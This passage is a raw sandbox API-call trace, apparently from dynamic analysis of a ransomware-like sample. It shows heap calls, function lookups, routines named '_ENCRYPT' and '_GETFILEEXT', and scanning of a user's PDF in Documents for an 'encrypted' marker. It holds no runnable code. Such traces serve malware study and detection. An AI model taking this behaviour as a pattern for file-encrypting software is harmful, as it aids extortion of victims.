wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0034.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0034.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.686] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0034.686] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0034.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0034.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0034.686] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca00 [0034.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0034.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0034.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0034.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af408 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0034.687] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0034.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0034.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0034.687] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0034.687] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0034.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0034.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0034.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0034.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0034.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.688] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0034.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0034.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889a90 [0034.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x889a90, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0034.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0034.688] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0034.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0034.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0034.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.688] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0034.688] CloseHandle (hObject=0x128) returned 1 [0034.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0034.688] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0034.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0034.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0034.689] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0034.689] FreeLibrary (hLibModule=0x76e10000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca00 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8c8 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.689] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.689] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.689] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0034.689] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.690] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0034.690] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.690] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0034.690] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0034.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.690] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.690] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.690] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.690] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f3cdfa0, ftCreationTime.dwHighDateTime=0x1d5bc03, ftLastAccessTime.dwLowDateTime=0xc3020f10, ftLastAccessTime.dwHighDateTime=0x1d5b8ae, ftLastWriteTime.dwLowDateTime=0xc3020f10, ftLastWriteTime.dwHighDateTime=0x1d5b8ae, nFileSizeHigh=0x0, nFileSizeLow=0x796e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="OY9QR-E1TerUi8X.pdf", cAlternateFileName="OY9QR-~1.PDF")) returned 0x7c20c0 [0034.690] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0034.690] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.690] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f3cdfa0, ftCreationTime.dwHighDateTime=0x1d5bc03, ftLastAccessTime.dwLowDateTime=0xc3020f10, ftLastAccessTime.dwHighDateTime=0x1d5b8ae, ftLastWriteTime.dwLowDateTime=0xc3020f10, ftLastWriteTime.dwHighDateTime=0x1d5b8ae, nFileSizeHigh=0x0, nFileSizeLow=0x796e, dwReserved0=0x0, dwReserved1=0x777648, cFileName="OY9QR-E1TerUi8X.pdf", cAlternateFileName="OY9QR-~1.PDF")) returned 0x7c20c0 [0034.690] FindClose (in: hFindFile=0x7c20c0 | out: hFindFile=0x7c20c0) returned 1 [0034.690] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.690] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.691] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, 